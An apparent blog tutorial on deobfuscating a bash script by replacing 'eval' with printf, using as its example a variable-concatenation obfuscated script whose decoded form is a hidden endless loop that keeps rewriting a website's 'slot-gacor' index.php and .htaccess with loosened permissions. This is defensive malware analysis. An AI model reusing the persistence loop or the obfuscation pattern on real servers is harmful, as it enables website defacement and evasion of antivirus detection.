Laman

How to Deobfusecate Bash Script


A while ago, I came across an interesting bash script. The script that I found is as follows: 

z="
";CFz='z$tz';UFz='z$Hz';ZBz='m'\'';H';jz=';bz=';xCz='='\''il';tCz='kz='\''';jCz='z='\''g';hEz='$Sz$';GDz=''\'' do';WDz='r'\'';y';eBz=';Zz=';SBz='uk'\'';';PCz='hmod';Hz='='\''ap';vEz='z$lz';sDz='='\''/s';XEz='z$Fz';lBz='e :;';kz=''\''pps';IBz='s'\'';T';ODz='='\''go';KEz=';fBz';ABz=''\'';iB';SFz='z$LB';sz='i'\'';V';az='iany';bBz=''\'';WB';KFz='DBz$';bEz='$Kz$';jEz='z$Vz';pz='/v'\'';';YDz='kca'\''';cCz='ab.g';BFz='rz$s';yFz='Bz$j';kDz='; sl';Ez='uz='\''';Gz=''\'';Nz';aDz='='\''pi';EGz='Bz$o';cFz='Rz$N';aCz=''\''aco';TEz=' "$A';aEz='z$Jz';HBz=''\''id/';KBz='t-g'\''';
...
;lFz='Bz$W';CCz=''\''ouc';hCz='ndex';rCz='='\''ex';iCz=''\'';BB';SCz=';KBz';MFz='FBz$';iFz='Bz$T';Vz='ark'\''';CDz='h'\'';m';VDz=''\''/va';IEz='z='\''0';gz='o'\'';P';xDz='z='\''r';tz='capi';NEz='fz='\''';FEz='-'\'';P';iBz=';GBz';dBz='.gi'\''';BEz='='\''an';yCz='.g'\'';';Jz='nz='\''';cz='='\''ar';QEz='='\''kc';HCz='='\''ta';rFz='Bz$c';VEz='$Cz$';HFz='ABz$';sFz='Bz$d';TBz='Xz='\''';pBz='Vz='\''';VCz='JBz=';YFz='$Mz$';uBz=''\''4 /';PBz='ar '\''';DCz='h'\'';q';FBz='&1'\'';';fBz=''\'' 06';yz='d/sl';DDz='z='\''s';OBz='z='\''v';wDz=''\'';YB';KCz='dukc';XCz='0'\'';o';fEz='Pz$Q';aFz='z$Pz';nz=''\'';cz';tFz='Bz$e';FFz='z$xz';XFz='z$Lz';sCz='.p'\'';';Zz='iz='\''';SDz='z='\''w';uFz='Bz$f';iEz='Tz$U';RCz='go.'\''';BCz='OBz=';mz='dir ';
...
mFz='Bz$X';WBz='ps'\'';';bDz='l.'\'';';LEz='='\''es';MBz=''\''ar/';gFz='Bz$R';JFz='CBz$';bCz='r'\'';D';oDz=''\''/di';XDz='z='\''u';UCz='7 '\'';';DFz='$uz$';wBz='app'\''';vDz='cp /';qEz='$ez$';Fz='erv/';RFz='KBz$';UEz='z$Bz';yDz='kab'\''';kBz='ga'\'';';CGz='Bz$m';cBz='z='\''l';tEz='$iz$';FDz=';Cz=';fCz='sd'\'';';uDz='Dz='\''';TDz='w/d'\''';Yz='&>'\'';';jFz='Bz$U';NCz=' /'\'';';rz=''\''w/d';AEz=';XBz';EEz=''\''lot';kEz='$Wz$';EFz='vz$w';YEz='$Gz$';PFz='IBz$';VFz='$Iz$';Wz=';lBz';oBz='b.'\'';';Lz=''\'';nB';iDz=''\''/de';dFz='Bz$O';vCz=''\'';oB';nCz='va'\'';';YCz='r/i'\''';nDz=';Lz=';dz='ka'\'';';ZEz='Hz$I';pCz='shm/';mDz=';mk'\''';DEz='bBz=';Cz='='\''de';ZFz='Nz$O';WEz='Dz$E';Az='z="';bFz='$Qz$';
eval "$Az$z$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$Rz$mz$nz$oz$pz$qz$rz$sz$Rz$tz$uz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$LBz$MBz$NBz$OBz$PBz$QBz$RBz$SBz$TBz$UBz$VBz$Hz$WBz$XBz$YBz$ZBz$Rz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$Mz$hBz$iBz$jBz$kBz$Rz$lBz$mBz$nBz$oBz$pBz$qBz$rBz$JBz$sBz$tBz$uBz$vBz$Mz$wBz$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$OCz$PCz$QCz$ECz$RCz$SCz$TCz$UCz$VCz$WCz$XCz$JBz$YCz$ZCz$aCz$bCz$Rz$cCz$dCz$eCz$fCz$gCz$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$qCz$rCz$sCz$tCz$uCz$vCz$cBz$wCz$xCz$yCz$ADz$BDz$CDz$DDz$EDz$FDz$GDz$HDz$DDz$IDz$JDz$KDz$LDz$Rz$MDz$NDz$ODz$PDz$QDz$GDz$RDz$SDz$TDz$UDz$VDz$WDz$XDz$YDz$ZDz$aDz$bDz$cDz$dDz$eDz$fDz$gDz$hDz$iDz$jDz$Rz$kDz$lDz$Mz$mDz$nDz$oDz$pDz$OBz$qDz$rDz$sDz$tDz$uDz$vDz$wDz$xDz$yDz$AEz$BEz$CEz$DEz$EEz$FEz$Rz$GEz$HEz$IEz$JEz$KEz$LEz$MEz$NEz$OEz$PEz$QEz$REz$z$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$cEz$dEz$eEz$fEz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$pEz$qEz$rEz$sEz$tEz$uEz$vEz$wEz$xEz$yEz$AFz$BFz$CFz$DFz$EFz$FFz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$NFz$OFz$PFz$QFz$RFz$ZEz$aEz$bEz$cEz$dEz$eEz$fEz$gEz$hEz$iEz$SFz$TFz$UFz$VFz$WFz$XFz$YFz$ZFz$aFz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz"

The script is written in bash and is very long. From the variables listed, you could say the script has been obfuscated. So it is necessary to decode the script so that we know what the system will do when the script is executed. 

So I did a little research on how to deobfuscate bash scripts, and I found something in a post on stackoverflow (All hail stackoverflow!!!).

Here's how to deobfuscate in bash: 

  1.  Look for the "eval" function in bash. 
  2.  Replace the "eval" function with "printf '%s\n'" (without double quotes(""))
    The code will be like this:     
    
...
bFz='$Qz$';
printf '%s\n' "$Az$z$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$Rz$mz$nz$oz$pz$qz$rz$sz$Rz$tz$uz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$LBz$MBz$NBz$OBz$PBz$QBz$RBz$SBz$TBz$UBz$VBz$Hz$WBz$XBz$YBz$ZBz$Rz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$Mz$hBz$iBz$jBz$kBz$Rz$lBz$mBz$nBz$oBz$pBz$qBz$rBz$JBz$sBz$tBz$uBz$vBz$Mz$wBz$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$...
  3. Now I try to execute the script. If you are unsure about executing the script on your computer, you can use online tools such as onlinegdb or the online BASH compiler from the tutorials point
  4. So now the initial code has changed to something like this: 
    
z="
";Ez='dev/';uz='erv/';Nz='apil';nz='-gac';nBz='/nul';Az='whil';QBz='pser';CBz='yark';lBz='e &>';iz='iany';jz='arka';cBz='gaco';Pz='nyar';bz='ppse';MBz='dir ';cz='rv/v';TBz='w/di';VBz='capi';lz='.id/';Sz='d/sl';iBz='eep ';gBz='0>&1';aBz='id/s';Tz='ot-g';dz='ar/w';Gz='var ';UBz='sduk';Xz='hp;c';tz='apps';IBz=';chm';HBz='cor/';WBz='l.gi';Zz=' 064';
...
ABz='pil.';wz='www/';rz=';mkd';mBz='/dev';hBz='; sl';LBz='/;mk';Lz='/dis';vz='var/';FBz='/slo';Dz='cp /';YBz='rkab';XBz='anya';bBz='lot-';PBz=' /ap';jBz='0,1;';fBz='ess ';fz='isdu';gz='kcap';
eval "$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$LBz$MBz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$NBz$OBz$PBz$QBz$RBz$SBz$TBz$UBz$VBz$WBz$XBz$YBz$ZBz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$hBz$iBz$jBz$kBz$lBz$mBz$nBz$oBz"

  5. Wow, I'm starting to read what the script will execute. However, there are still confusing variables, and there is still an eval function in the script. Let's change it again and execute it again. Some tools for obfuscating don't just obfuscate once, but many times.
  6. Now everything is clear. What commands are executed by the script (I edited several lines because they contain sensitive words) 
    
while :; do cp /dev/shm/var /appserv/var/www/[redacted]/slot-gacor/index.php;chmod 0644 /appserv/var/www/[redacted]/slot-gacor/index.php;mkdir /appserv/var/www/[redacted]/slot-gacor/;chmod 0777 /appserv/var/www/[redacted]/slot-gacor/;mkdir /appserv/var/www/[redacted]/;touch /appserv/var/www/[redacted]/slot-gacor/.htaccess 0>&1; sleep 0,1; done &>/dev/null


Conclusion:

In my opinion, deobfuscating the bash script is not difficult, but it still requires carefulness in doing it. This obfuscation technique makes obfuscated scripts difficult for antivirus and malware detectors to detect, so we need to be careful and thorough to find these scripts. For example, in this post, the script that is obfuscated aims to create a persistent mechanism, in which case the script creates a page to deface a website continuously until the script is stopped and deleted.


*)PS : I edited some code in the example script. So if you want to try, you can use the script on StackOverflow that I mentioned earlier.
Diposkan oleh di
Label: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)